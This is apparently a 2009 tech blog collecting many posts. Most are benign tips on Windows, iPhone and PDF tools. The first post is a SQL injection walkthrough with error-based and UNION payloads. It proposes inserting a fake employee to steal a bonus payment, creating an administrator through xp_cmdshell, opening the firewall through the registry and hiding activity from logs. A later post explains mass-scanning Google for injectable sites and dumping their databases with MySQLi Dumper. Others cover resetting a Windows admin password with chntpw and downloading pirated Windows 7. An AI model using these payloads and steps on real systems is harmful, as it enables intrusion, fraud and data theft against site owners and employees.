2009-06-18T18:10:00.002+05:30

Introduction

I've seen a lot of short tutorials on SQL injections and then again some which rivals the Great Wall of china in length, but I've very rarely seen a SQL injection tutorial based on an actual hack where things aren't always ideal.

This guide will attempt to explain the very basics of SQL injections.

This tutorial is written from a website created by a friend of mine which was loaded on my local host.
After navigating around for a while I found something interesting

http://localhost/news/display.asp?id=75

-------------------------------------------------------------------

Section 1 - A Quick Glance at SQL Statements

-------------------------------------------------------------------

Anyone who's ever taken a look at SQL injections won't be surprised to know what I did next...

http://localhost/news/display.asp?id=75'

Unclosed quotation mark after the character string ''.

So for all of you who don't know why I'm getting the error:

The ID is passed (posted) to the SQL server and added in the query...

SQL SELECT queries consists of 3 basic building blocks,

1) SELECT
2) FROM
3) WHERE

SELECT is used to specify what information should be returned, usually column names are used here

FROM specifies where the information that you want to select is contained, usually a table name

WHERE is used to specify conditions, data will be only be selected if the data set matches the conditions.

Let's take the following example of a table called "Demo" which consists of the columns, "ID", "Text", "Active" and "GROUP"

TBLDEMO

ID TEXT ACTIVE GROUP
1 First Result TRUE 0
2 Second Result FALSE 54
3 Third Result TRUE 54
4 Fourth Result FALSE 36
5 RAMBO FALSE 1
6 NULL TRUE 0

Now based on this information the query

SELECT Text, ACTIVE, GROUP FROM TBLDEMO;

Should produce the following results:
First Result TRUE 0
Second Result FALSE 54
Third Result TRUE 54
Fourth Result FALSE 36
RAMBO FALSE 1
TRUE 0

Notice how "NULL" is not displayed at all...
This is because a NULL value literally means nothing.
0 is an actual value, it means 1 less than 1 and 1 more than -1.
This is a very very important difference to understand, since some columns are set to accept NULL values, while others don't!

SELECT TEXT from TBLDEMO where Active = TRUE;

First Result
Third Result

These are all the values for the column text WHERE the "ACTIVE" column has a value equal to TRUE.

SELECT TEXT from TBLDEMO where Active <> False;
Would produce the same result as in the example above.

Got it? It's a lot like playing battleship, one player calls A4, based on the data in front of the other player a response of either "miss" or "hit" is generated. It's not always that easy though, SQL queries can become very very complicated, this is the absolute basics.

-------------------------------------------------------------------
Section 2 - Gathering the Information
-------------------------------------------------------------------

Finding a point of reference

Carrying on from http://localhost/news/display.asp?id=75'

Unclosed quotation mark after the character string ''.

An educated guess would tell me that ID in the query string is used a sql query which goes something like this:

SELECT title, author, description, synopsis, date FROM tblwhichcontainsNewsItems WHERE ID = X

Where X is replaced with the value from the URL,

Which means if I do this http://localhost/news/display.asp?id=75+HAVING 1=1--

Column 'NEWS.NewsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

So what exactly did I achieve there?
That, 'NEWS.NewsID' is the first column in the table NEWS

So by adding GROUP BY NEWSID(http://localhost/news/display.asp?id=75+GROUP+BY+NEWSID+HAVING 1=1--)

I receive a new error message and you guessed it, the second column in the NEWS table is given to me.

-------------------------------------------------------------------

Section 3 - Moving the point of reference

-------------------------------------------------------------------

Well that's great, but I doubt we'll be able to get anything remotely exciting in the news table, to be honest I'd rather watch Season 4 of House with commentary than stare at the info for a bunch of news articles, so what we need to do next is find other tables contained in the Database. Now we know the site has a sql injection vulnerability and we were already able to find the complete structure of one table, so by amending the sql query a bit, it spits out the info we need...

So from here I try the query UNION SELECT name FROM sys objects...

But now I get an error message, why?

Each SQL statement within the UNION query must have the same number of fields in the result sets with similar data types.

This is translated a bit from the original error message for a bit more clarity, I need to UNION with the same number of columns and these columns MUST match the same data types...

Let's take a closer look at this based on the previous example:

TBLDEMO

ID TEXT ACTIVE GROUP
1 First Result TRUE 0
2 Second Result FALSE 54
3 Third Result TRUE 54
4 Fourth Result FALSE 36
5 RAMBO FALSE 1
6 NULL TRUE 0

TBLUNION

ID TEXT UserID Username Password
1 First Result TRUE john john
2 Second Result FALSE mike mike
3 Third Result TRUE Larry Larry
4 Fourth Result FALSE Natasha Natasha
5 RAMBO FALSE Bruce Bruce
6 NULL TRUE Chuck Chuck

So let's take the SQL query from the first example and add a union query to it:

SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT Username,Password FROM TBLUNION

So the first problem is that the first part of the query select 3 columns whilst the second part only select 2...

We'll need to amend this so both "sides" of the union query select the same number of results

SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT Username,Password,UserID FROM TBLUNION

Now a new error, "Cannot convert...whatever"

This is where data types comes into play,

Compare the columns like so:

TEXT USERNAME
ACTIVE PASSWORD
GROUP USERID

If these columns are rewritten to display the type of data it can take it should like something like this:

String String (Correct)
Boolean String (Wrong)
Integer Integer (Correct)

So we should rewrite the query so the statements are the same in

1) NUMBER
2) DATA TYPE

So what happens when a query select 7 columns but the table your trying to read from only has 3?

Use the same column more than once...

UNION SELECT TEXT,TEXT,TEXT,TEXT,TEXT,TEXT,TEXT FROM TBLDEMO;

This is a perfectly valid SQL query, it will display the same info 7 times, but sometimes that's the easiest way to extract the information.

Getting table names, continued...

So from here let's carry on with the previous query and extract table names from the application.

UNION SELECT name,name,name,name FROM sys objects.

The page loads just fine when this UNION statement is added and the info isn't displayed anywhere on the page...
Now we'll have to generate an error to get the info we require, this can be done in the same fashion as when extracting column names Having 1=1 and GROUP BY

UNION SELECT name,name,name,name FROM sys objects HAVING 1 = 1

-------------------------------------------------------------------
Section 4 - In Closing

-------------------------------------------------------------------

Now we receive the first table in the database, we could go on with GROUP BY and comma separate each result, but most web server only process requests up to that many characters then you start seeing 404 errors (Page not found)

Most of your first results should be system tables, you can exclude these tables by adding where type = 'U'
This will force the SQL query to only bring back results where the table was created by a user ie. NOT the default system tables...

Carrying on like this (Yes I know it can be time consuming) you should be able to see each table in the database, if there are so many tables that you can't carry on and system tables are already excluded, look into the statement
WHERE name NOT LIKE '%sometext%' I'm not going to go into detail on this since it is quite rare.

So while digging I discovered the following interesting tables and the row's values in each table:

Table name + column name Value returned
Competition.CompetitionID 1
Competition.Name Apr-08
Competition.bankNo ######
Competition.Outstanding TRUE
Competition.basevalue 4000
Competition.competition Employee of the month
Competition.Winner John Doe
Competition.WinnerID 34
Competition.TransactionStatus Pending

Table name + column name Value returned
Employees.ID 1
Employees.Name Bill
Employees.Surname Gates
Employees.Email bill@gmail.com
Employee.Department Management
Employees.DepartmentBuildingID 1
Employees.Branch Head Office
Employees.Salary MASKED (some insane value)
Empluyees.JobTitle CEO
Employees.BankAccountNr 11111111
Employees.BankAccountName General Savings
Employees.BankAccountCode 1534
Employees.LeaveDue 98
Employees.Phone Number 555-555 55
Employees.CellNumber 065 5452 54111
Employees.Address Some address

So from this information I can deduce that there is a bonus paid to the employee of the month, so I wonder, what would happen if I create a new employee on the system, rig the database to pay the bonus to that employee and set up the bank account for this new employee as my own?

The short answer: Unless you're really good with making money and people disappear, you'd get caught, which is something I'm not covering in this tutorial :)

So anyway, by running a INSERT INTO Employees values [the values] statement and running this same statement on the Competition table, I should receive a large little bonus next month.

I've explained the very basics of gathering the information required. Making changes in the DB, that's up to you, I've never been a fan of "here you go, now your an elite h4x0r" because it really makes script kiddies think they know everything.

-------------------------------------------------------------------
Section 5 - Going further
-------------------------------------------------------------------

This guide was written as a very basic introduction for those who are just starting out, but for those of who you are a bit further than getting names and data, I still wanted to include a few things so you too can gain from this article, I suggest you take a look at the following procedures:

1) Xp_cmdshell `net user foo bar /ADD' Xp_cmdshell `net localgroup /ADD Administrators foo

2)sp_makewebtask (Probably my all time favorite since so many sys admins block CMDShell and not Makewebtask)

3) XP_RegRead & XP_RegWrite
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
(Note if a hardware firewall is preventing the connection, this trick will not work)

4) SP_Password (Just to prevent logging :) )

Boot your PC in less than 10 seconds

2009-06-18T17:55:00.001+05:30

So you came here to see how to bootup your PC in 10 seconds lesser? Well, you have come to the right place. To a daily user, shaving that extra few seconds for booting up can go a long way. Before I proceed, may I ask for you to backup your data and registry first just to be safe. You are warned, use with caution.

How to bootup computer in 10 seconds lesser?

1) Press Windows Key and "R" to launch the run command.

2) Type "regedit" inside the input space.

3) Navigate to the registry key

HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex

4) Locate the key"Startup Delay" and double click on it.

5) Select Decimal, and change the value to 40000

Enjoy the reduction in startup time and I look forwarding to hearing good news from all of you.

Removal of W32/Inservice.IA Trojan Manually

2009-06-18T17:50:00.002+05:30

Manually Removing of W32/Inservice.IA Trojan

W32/Inservice.IA is a trojan. The trojan will infect Windows systems.
This trojan Copies its files to Temp Folder as hidden files or active non-hidden files.
This trojan information updated on June 6, 2009.
Other names of W32/Inservice.IA Trojan:
This trojan is also known as Trojan-Downloader.Win32.INService.ia, TROJ_INSERVC.C.

Damage Level : Medium/High
Distribution Level: Medium
W32/Inservice.IA Trojan Manual Removal Instructions
Recommend Removal from Safe Mode:
How to Start in Safe mode:
Restart your Computer, Press F8 Repeatedly, when your Screen turns on, Select Safe mode, press enter.

The Infected Files Can be Seen in these folders and names also Running in Tasks
End the Following Active Process Before Removal

[ Kill the Process, Use Killbox if your Access Denied ]

Download W32/Inservice.IA Trojan Known File Removal Tool

[In Windows Vista Run As Administrator, After Execution System Will Restart]

%Documents and Settings\Default User\Local Settings\Temp\local518467.exe
%Documents and Settings\Default User\Local Settings\Temp\local341.exe
[ No Exact Information about Files, search above related files in Program files Folder ]
If you have any of these files in running process from task manger, end the process before removal.
Note: if task manager is disabled, Download the following file, Click to Download - Enable Registry.reg [ Right Click - Save Target As/Linked Content As ]
Open it with Regedit.exe [%system32\regedit.exe], then it Confirms Add to registry Yes or No, Confirm Yes, then click Ok.

W32/Inservice.IA Trojan Entries Manual Removal From Registry

Click Start, Run,Type regedit,Click OK.

Note: If the registry editor fails to open the threat may have modified the registry to prevent access to the registry editor.

Download this UnHookExec.inf, [ Right Click - Save Target As/Linked Content As ]
and then continue with the removal. Save it to your Windows desktop. Do not run it at this time, download it only.
After booting into the Safe Mode or VGA Mode
Right-click the UnHookExec.inf file and click Install. [This is a small file. It does not display any notice or boxes when you run it.]

W32/Inservice.IA Trojan modifies registry at the following locations to ensure its automatic execution at every system startup:
Delete The Entries

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Delete file entries from right side

Search Registry For W32/Inservice.IA Trojan File Names listed above to remove completely,
Edit Menu - Find, enter Keyword and remove all value that find in search.

Exit the Registry Editor,

Restart your Computer.

Hacking Windows Using Linux

2009-06-08T22:17:00.003+05:30

Friends on net we found out that many of you are asking for hacking windows using Linux or other operating systems.

So here i m writing the trick which allows you to hack the admin password of windows using linux.

Firstly,Windows is installed on you computer and then you need a live CD of linux,here we will use a live CD of UBUNTU.

Boot from the Live CD and perform the 7 easy step to hack the windows Admin password.

Steps:

1: Install a program called chntpw

Command is: $ sudo apt-get install chntpw

The rpm pakage installed is the packege to change password.

2: After successfully installing chntpw, you have to access the Windows NTFS partition by mounting it and allowing read/write support.

Use Mount system Call.

3: After that, navigate to WINDOWS/system32/config

use cd command to navigate.

4: Once inside the config directory, issue this command:

$ sudo chntpw SAM

Command to reset admin password.

As you are in Linux the security of windows is bypassed and the password can be changed easily.

5: A long display of information will follow.

Just ignore them.

6: Once you are prompted to reset the password, it is recommended to leave the password blank with an asterisk (*).

7: Reboot, with windows and you can now login to Windows with full administrative access.

The trick displayed here is for educational purpose only.

Windows 7 Little Tweaker

2009-06-08T22:07:00.003+05:30

Windows 7 Little Tweaker is a simple windows utility that tweaks Windows 7 settings and adds a few additional features to Windows 7 menus. Windows 7 Tweaker can disable low disk space warnings, the UAC, speed up Explorer navigation, and do a lot more.

Windows 7 Tweaker is free and can be downloaded from here.

Download Windows 7 in 300 MB

2009-06-01T22:59:00.007+05:30

Windows 7 includes a number of new features, such as advances in touch, speech, and handwriting recognition, support for virtual hard disks, improved performance on multi-core processors, improved boot performance, and kernel improvements.

Windows 7 adds support for systems using multiple heterogeneous graphics cards from different vendors, a new version of Windows Media Center, Gadgets being integrated into Windows Explorer, a Gadget for Windows Media Center, the ability to visually pin and unpin items from the Start Menu and Taskbar, improved media features, the XPS Essentials Pack being integrated, Windows PowerShell Integrated Scripting Environment (ISE), and a redesigned Calculator with multiline capabilities including Programmer and Statistics modes along with unit conversion.

Many new items have been added to the Control Panel including: ClearType Text Tuner, Display Color Calibration Wizard, Gadgets, Recovery, Troubleshooting, Workspaces Center, Location and Other Sensors, Credential Manager, Biometric Devices, System Icons, Action Center, and Display. Windows Security Center has been renamed the Windows Action Center (Windows Health Center and Windows Solution Center in earlier builds) which encompasses both security and maintenance of the computer.

The taskbar has seen the biggest visual changes, where the Quick Launch toolbar has been merged with the task buttons to create an enhanced taskbar or what Microsoft internally refers to as the "Superbar". This enhanced taskbar also enables the Jump Lists feature to allow easy access to common tasks.[28] The revamped taskbar also allows the reordering of taskbar buttons.

Screenshots have appeared demonstrating a new feature called 'Peek'. Peek is a quick way of making all visible windows transparent for a quick look at the desktop. A Microsoft spokesman said that "this will be useful for users who want a quick look at the news" in reference to RSS gadgets on the desktop.

For developers, Windows 7 includes a new networking API with support for building SOAP based web services in native code (as opposed to .NET based WCF web services),new features to shorten application install times, reduced UAC prompts, simplified development of installation packages, and improved globalization support through a new Extended Linguistic Services API.

OS: Microsoft Windows 7 Original
Type of File: WinRaR
Size: 2.14 GB AFTER EXTRACTING!

How to Install:
1. Extract the rar archive....
2. Burn on a DVD
3. Now Boot and Install Just like Vista

Minimum recommended specs call for:
1. 1 GHz 32-bit or 64-bit processor
2. 1 GB of system memory
3. 16 GB of available disk space
4. Support for DirectX 9 graphics with 128 MB memory (to enable the Aero theme)
5. DVD-R/W Drive
6. Internet access to get updates

Features of Windows 7
Easier
Windows 7 will make it easier for users to find and use information. Local, network and Internet search functionality will converge.
More Secure
Windows 7 will include improved security and legislative compliance functionality.
Better Connected
Windows 7 will further enable the mobile workforce. It will deliver anywhere, anytime, any device access to data and applications
Lower Cost
Windows 7 will help businesses optimize their desktop infrastructure. It will enable seamless OS, application and data migration, and simplified PC provisioning and upgrading.

Download Here:

Download Window 7 Part 1

Download Window 7 Part 2

Download Window 7 Part 3

Transform Linux to Windows 7

2009-06-01T22:50:00.001+05:30

Microsoft continues to tease us with a RC release of the upcoming operating system in the Windows franchise, Windows 7, which was released for public earlier this month on May 5th.
We have seen many Windows 7 transformation packs for XP and Vista but one for Linux is new to me. But unfortunately, it’s not for Ubuntu.

A designer, rmtux1345, at KDE-Looks.org have created a transformation pack that transforms your Kubuntu 9.04 into Windows 7. This guy here has worked pretty well in giving the maximum Windows 7 look and feel in Linux. Apart from looks, this pack also claims to make your Kubuntu work like Windows 7 in some areas.
Vistar7 includes Windows 7 official wallpapers plus the ones included in beta release, user pictures, icons, all Windows 7 sound theme files, splash screens and three popular fonts from Microsoft.

rmtux1345 provides no support, updates or bug fixes for this transformation pack now. It was just created to show how similar Windows 7 interface is with KDE4.

Download Vistar7 Transformation Pack

To download and for more information regarding installation, you can do it from here: Download Vistar7 Transformation Pack

MySQLi Dumper

2009-02-15T00:41:00.004+05:30

Table of contents:
1.Introduction
2.Getting the program
3.Running the Scan
4.Finding the vulnerabilities
5.Understanding the program
6.Exploitation
7.Getting the Tables
8.Leaving your message

Disclaimer:
We by no means encourage or take responsibility of the tutorial of this program. Blah blah blah...don't do anything stupid guys.

Introduction:
Welcome to my second article, in this article basically we will be looking at the program: MySQLi Dumper, which is a SQL vulnerability Scanner, that deals with the dumping of data through SQL injection. Now it has only been recently that i have discovered the uses of having a SQL scanner, and i have still not yet mastered it or configured it to a wider range of exploits. However, i had to spread the word.
Basically the role of a scanner is to use search engine's results (Google/Yahoo) to find pages that have queries that may be vulnerable. In this article, my goal is to basically run you through how to use MySQLi and also run through a bit of the theory behind the exploit/attack.

Getting the Program:
Before we begin scanning any sites, we must first all have our own copies of the program. To get the program, all we have to do is download it from this site: Click Me
Once u have it downloaded, extract the files and save it to a safe and secure folder and open the program.

Running the Scan:
Okay, well now you should have to program open and on the page you should see essentially a blank page, which at the top has a set of tabs:

- Scanner
- Num.Blind
- Dump MySQL
- ETC

Logically, if we are to have any chance of finding an exploit, we must first have our archive of possible, vulnerable sites. Hence, we come to the scanner tab.
This tab basically allows us to put in which criteria we want to scan for, and from what search engine we are going to do it from.
So for this example we are going to be searching for pages with SQL based queries. This is going to be our first search type:
Click Me

Here we have the following criteria:

- URL has ".php?newsid="
- From Google
- Timeout of 5 seconds (increase this if your internet is slow and vice versa)
- Results of 100pages

Once, we have our settings dialed right, we have to click "Start Scann SQLi" and away we go.

/* on a side note, you can change these values for different sites *\

Finding the Vulnerabilities:
Now comes the beauty of this program, the ability to inject chosen SQL into the archive to find a vulnerability.
- To get there click on the Vuln.SQLi tab
- Configure your settings to that of your internet standards.
- Also there is now a SQL injection drop down box, you can configure that to determine which SQL injection you want to produce the errors.
Now all you do is click Start Scan.

Understanding the program:
Now with all programs like these, it is essentially very easy to know the process of running the application, without actually knowing the theory of how the program is working.
When scanning for vulnerable sites, the program injects code into the database that will output an error.
A very common (and default) way of returning an error is to input something that is essentially incorrect.
A MYSQL page for example uses SQL queries to search a given database for given results. Now if we were to input an error after this, the database would return an error, and if the page is vulnerable, will also return that error.
In the SQL injection part of the Vuln.SQLi tab, we will find the default SQL injection as being:

CODE :

+and+0=1+union+select+

What this does is input corrupt data into the database and hope for a result.

CODE :

An example: www.vulnsite.com/index.php?id=0

Now this site has a PHP query for the variable id.
If we were to inject arbitrary code after it, we could possibly output and error and we would know we may exploit it.

So for hypothetical sake, we input the following:

CODE :

www.vulnsite.come/index.php?id=0+AND+0=1+UNION+SELECT+

And the page outputs an error, we know we have a probable:

CODE :

mysql_num_rows() line 255

Exploitation:
Alright, now at this point, we should have a list of vulnerable sites, and we now need to see if they are exploitable.
So, once we have these pages we copy and paste our first page, and we go to the "Num.Blind Tab".
Now we should have pasted the page into the main form and click GET.
Page should look like this:
Click Me

Now part of this exploitation is searching through errors to see when they disappear or when the error no longer applies. So the program will guide us through this process with the GET PAGE button.

OK to get started I'll make easy I'll do it in steps:
- Put page into the top bar and click GET PAGE
- The page should come up with an error of some sort on the screen, make note of it and click GET PAGE again.
- Keep clicking GET PAGE until the error disappears....WE have our point of exploitation
- Now since the code is now true we must change:
CODE :

id=1 to id=-1

- Once it's edited click 'GET PAGE MANUALLY'
- If you have done everything right, the errors should disappear and we should get an output... An example is here...Click Me

Making the attack:
Now we have found an insecure site, we need to go to the DUMP MYSQL tab, and paste in the top form.
Once it is pasted, you must remember the output for which the database echoed...In my example it was '3', however this will change.
So now where we have our vulnerable code, we must change it to look like this:

CODE :

www.vulnsite.com/index.php?id=1/**/union/**/all/**/select/**/1,2,[t],4--

- Now click 'Get Info' and it should dump the relevant data of the system.
- Now all you have to do is dump the necessary data from the database (databases, tables, columns etc)

Conclusion:
The rest of the program, is quite useful, but it's uses are beyond this article..(maybe i'll right another)
But i hope by showing you this program, maybe some of us can begin to understand vulnerabilities on the internet and give us power to fix them.

Make a Shortcut to Lock Your Computer

2009-02-15T00:33:00.001+05:30

Leaving your computer in a hurry but you don?t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

To create a shortcut on your desktop to lock your computer:

Right-click the desktop.
Point to New, and then click Shortcut.

The Create Shortcut Wizard opens. In the text box, type the following:
rundll32.exe user32.dll,LockWorkStation

Click Next.

Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like.

Click Finish.

You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll).

To change the icon:

Right click the shortcut and then select Properties.
Click the Shortcut tab, and then click the Change Icon button.

In the Look for icons in this file text box, type:
Shell32.dll.

Click OK.

Select one of the icons from the list and then click OK

You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Top 5 iPhone tips and tricks

2009-02-15T00:25:00.002+05:30

OK, so might already know one or two of these tips and shortcuts to improving your iPhone experience, but hopefully a few of these following pointers will be news to you. Print out the list and give 'em a try, and feel free to post your own to the comments section.

Some of these iPhone tricks were revealed in a recent sit-down chat with Bob Borchers, senior product executive at Apple.

1. Two ways to save images
You're surfing the Internet in Safari and stumble upon a photo you'd like to save. Simply press and hold on a photo when on a website and you'll be prompted with a menu asked if you'd like to "Save Image." Once the photo is saved, you can view it offline, email it or set it as wallpaper.

On a related note, if you want to take a screenshot of a website or application, press down on the Home button and tap the Sleep button. You'll hear the camera click, see a white flash and the screenshot will be saved.

2. Oh those magic headphones
Those trendy white earbuds do more than you might realize. The iPhone's headphones have a small button on the microphone and it performs multiple functions. For example, press once to start the iPod and begin playing a song. Press again to pause the track or double-tap to skip to the next song.

If a call comes in, press the button once to answer or double-tap to send the call right to voicemail. During a call, press once to hang up.

3. Browser tricks
Want to know an easy way to scroll to the top of a website in Safari? Simply tap at the top of the phone screen, where the time, battery and signal bars are. Doing this works in most applications, but in Safari it also brings up the URL to type in a new website.

If your preferred search engine is set to Google in Safari you don't need type in the "www" and ".com" for many websites. For example, simply type "usatoday" (without the quotes) in the URL window. If you need to type a domain suffix (e.g. ".net"), press and hold the ".com" button for ".net," ".edu," ".org" shortcut keys and use your finger to slide between them.

4. No place like Home
There are many uses for that circular Home button, located in the center and bottom of your iPhone. If you've got ten pages of applications to peruse through, you can quickly go back to the first page by pressing the Home button once (here's where you should drag and drop your most used apps). By the way, you can also tap the bottom left or right corners of the screen to switch between pages instead of swiping your finger across.

Double-tapping the Home button brings up your phone's Favorites screen, where you can list the people you call the most. If you prefer, edit the Home button's function in Settings so when you double-tap the Home button it takes you right to your music playlists.

5. Little-known email tips
You can delete unwanted emails en masse rather than deleting one at a time. In your Inbox, simply click the Edit button and check off the emails you want to delete with your finger and then choose Delete. Otherwise, to delete a single email, simply swipe the email sideways and you'll see the red "Delete" button option.

One of the biggest issues iPhone users have is typing an email on the "soft keyboard" with the email's vertical screen layout. But there are a handful of free App Store downloads, such as EasyWriter, that can resolve this by letting you hold the phone horizontally (landscape view) and thus offering a wider keyboard with bigger buttons

Windows 7 to be released with 6 different versions

2009-02-15T00:22:00.002+05:30

Despite the waning response from the various versions of Windows Vista during its official launch, Microsoft is not ready to give up just yet. In its latest debut of Windows Operating System, Windows 7 is staged to be release in no less than 6 whopping different editions. By itself, Windows Vista has already made choosing the different versions a pain, who know what is installed for us ahead?

To summarise, the various versions come in the form as below:

Windows 7 Starter Edition
Windows 7 Home Basic
Windows 7 Home Premium
Windows 7 Professional
Windows 7 Enterprise
Windows 7 Ultimate

But it has been confirmed that the primary focus will be on two primary editions of Windows 7 namely the Windows 7 Home Premium and Windows 7 Professional. Perhaps the move can help us in reducing the time of choosing the relevant version of the OS.

Some PDF Image Extract : Extract Image From PDF File

2009-02-15T00:20:00.000+05:30

Some PDF image extract is a simple tool that extract image in the pdf file to TIFF, JPEG, BMP, GIF, PNG, TGA, PBM, PPM format.

Download Some PDF image extract and installed.Then select pdf file and press 'F5' starting to convert.After finished ,all the converted image will store in a folder.

Some PDF image extract supports Window NT/2000/XP/2003/Vista.

PDF Merger:Merge PDF Files into single File

2009-02-15T00:15:00.003+05:30

MergePDF, like what the name suggests, is an online tool that you can use to merge PDF Documents into a single file. If you have multiple, small sized PDF documents that you want combined, you might want to try using this tool.In the website MergePDF

For each process, you are allowed to merge up to 10 PDFs with sizes not exceeding 5MB. If you think that the file size limit is rather small, you’ll have to do it using desktop applicatons such as Acrobat PRO or some other PDF related desktop software. If you’re merging large files, then most probably you don’t want them to be lurking around the internet anyway. Even if MergePDF stated that the files that are uploaded are removed right after the merge process is completed.

The only thing that is not safe in itself is the data transfer as we are not transferring through SSL. If our users send us an email requesting SSL, we will happily address that and provide upload over https.

This is a neat and simple tool for doing a simple task and it won’t cost you anything. It merges PDFs, no manipulating no editing,that’s as simple as it gets.

Mobify.me: Create a Mobile Version of Your Website

2009-02-15T00:07:00.001+05:30

Optimizing a website’s landing page for mobile viewing is not an easy task. That’s what Mobify.me is trying to solve. They aim to provide an easy way for developers to produce a mobile version of websites in just a few hours of work.

This will allow you to make a faster loading mobile version of your website. You can choose which elements you want to include and upload custom images optimized for mobile viewing. This means that you can lower the bandwidth cost of loading your site on a mobile device. Resizing images is one way of doing it.

You can also customize your links, pages and edit CSS

. Mobify also supports DNS redirects. This means that your mobile site will not lose its URL structure when you use your mobile URL (e.g.: http://m.yoursite.com). Mobify.me users are also provided with a JavaScript snippet that detects mobile devices which will drive mobile users to your mobile URL.

Mobile site (if it exists at all) is separate in terms of content management flow and URL structure, creating SEO challenges. Unless a site has a dedicated tech team or is using a framework with decent mobile functionality (aside from WordPress, there isn’t many), this is difficult.

Developing a mobile presence is a lot of work. Device detection, image resizing, content syncing… Mobile used to be difficult. Mobifying a complete site takes from 5 minutes (a blog) to several hours (a complex Portal like TechVibes).

Automated scp on Linux

2009-02-15T00:05:00.001+05:30

Scenario

You would like to automate the export of SQL dump files from one Linux server to another using scp. These dump files are to be generated and exported once every two weeks. You also wish to archive these dump files on the source server.

So let’s say the servers and directories are as follows:

Source

Hostname: perak
Username: nazham
Dump file directory: /home/nazham/data_export/current
Archive directory: /home/nazham/data_export/archive/yyyymmdd

Target

Hostname: selangor
Username: romantika
Target directory: /home/romantika/data_import

Passwordless scp

First you need to set it up so that you don’t need to enter a password for scp. The overall picture is as follows:

At the source server, generate a pair of public and private keys [1] using RSA.
Store the private key in a specific place in the source server.
Store the public key in a specific place in the destination server.
And that’s it! Now you’ll no longer be prompted for a password when using scp.

One-off steps

# login to perak with username nazham ssh-keygen -t rsa # choose default location, no passphrase - just press enter at all prompts scp ~/.ssh/id_rsa.pub romantika@selangor:/home/romantika/.ssh/authorized_keys # I'm assuming the file authorized_keys does not exist! # otherwise, you need to append the contents of id_rsa.pub to it. crontab -e # add the following: # 1 0 1,15 * * nazham /home/nazham/run_data_export >> /dev/null 2>&1 # which means, run at 12:01 am every 1st and 15th of the month mkdir ~/data_export mkdir ~/data_export/current mkdir ~/data_export/archive

The run_data_export script

todaysDate=`date +%Y%m%d` oldDate=`date -d '1 year ago' +%Y%m%d` exportDir=data_export mysqldump -u username -ppassword -r ~/$exportDir/current/filename dbname tablenames echo $todaysDate > ~/$exportDir/current/importdate.txt scp ~/$exportDir/current/* romantika@selangor:/home/romantika/data_import mkdir ~/$exportDir/archive/$todaysDate rm ~/$exportDir/current/importdate.txt mv ~/$exportDir/current/* ~/$exportDir/archive/$todaysDate if [ -d ~/$exportDir/archive/$oldDate ]; then rm -r ~/$exportDir/archive/$oldDate; fi

The Linux date command

I’m very impressed by the Linux date command. This might be old news to some, but the fact that I’m able to say date -d '1 year ago' or date -d '30 days ago' completely blows the mind.

Notes

[1] From Pass on Passwords with scp: “If you’re not familiar with public key cryptography, here’s the 15-second explanation. In public key cryptography, you generate a pair of mathematically related keys, one public and one private. You then give your public key to anyone and everyone in the world, but you never ever give out your private key. The magic is in the mathematical makeup of the keys; anyone with your public key can use it to encrypt a message, but only you can decrypt it with your private key.”

Reduce Windows Animation Speed in Windows Vista

2009-02-15T00:01:00.002+05:30

Windows Vista comes with several new enhancements, however for these added features you have to pay the price of slow processing speed for even the fastest of computers. The main reason is the visual upgrades, which though looks good can drastically reduce the performance of your system.

If your system can not take the load of Window Vista and you still want to use it for considerable performance, you may tweak Windows Vista for certain optimizations. For example; when you minimize, maximize or close any windows/applications, the animation speed to perform these tasks is a default setting which is not under the control of the user.

Never the less, you can make this transition run slower while holding the SHIFT key button; after performing the following registry hack as shown below:

1. Click on the Start button and type regedit in the Start Search field, then press enter.

2. If User Account Control prompts you for consent, click on Continue.

3. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM

4. In the right hand pane, right click on an empty space and from the context menu that appears choose “New > DWORD (32-bit) Value”.

5. Give the new DWORD (32-bit) Value a name of AnimationsShiftKey.

6. Double click on the “AnimationsShiftKey” value and give it a value of 1.

7. Close the Registry Editor and log off of Windows and log back in for this to take effect.

If you have successfully edited the registry, you will notice that the animation speed has become slower when compared to previous without holding the SHIFT key. Enjoy!

Top Secret Phone - Zumbafone Leaked

2009-02-14T23:58:00.000+05:30

We have not heard of the Zumbafone yet, but its makers are confident it could revolutionize the way we communicate. The Zumbafone is currently considered top-secret and hence they are not revealing us much more.

The Zumbafone is a carefully shrouded device being developed by a British company called IA Technologies. The company manufactures military technology and a bunch of other stuff too.

The Zumbafone is the size of a credit card and contains two interlocking pieces. One half snaps off to function as an all-inclusive earpiece-phone. The other, when connected, offers a more traditional keypad and screen.

Once we attach the earpiece half, the Zumbafone links us to an "Internet Portal" that holds all of our information. Say the name of a contact, and we're instantly connected. By tapping a button, we can speak out a text message and have it sent wherever needed. Incoming text messages are displayed on the screen half of the phone if we have it attached, or spoken aloud if we're wearing the earpiece.

The device is slated to be on store shelves by the end of 2009. Visit PCWorld site for more details.

Coding errors that helped Hackers and Intruders

2009-02-14T23:55:00.000+05:30

There has been some 25 software coding errors that helped the Cyber criminals helped them to have access the site and accounts to nearly 1.5 million security breaches.

The SANS Institute in Maryland said that in 2008, just two of the errors led to more than 1.5m web site security breaches.

The organisations, which helped making the list, include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec published the document.

"The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.

SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors."

While, most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.

The 25 Most Dangerous Programming Errors are:

CWE-116:Improper Encoding or Escaping of Output

CWE-89:Failure to Preserve SQL Query Structure

CWE-20:Improper Input Validation

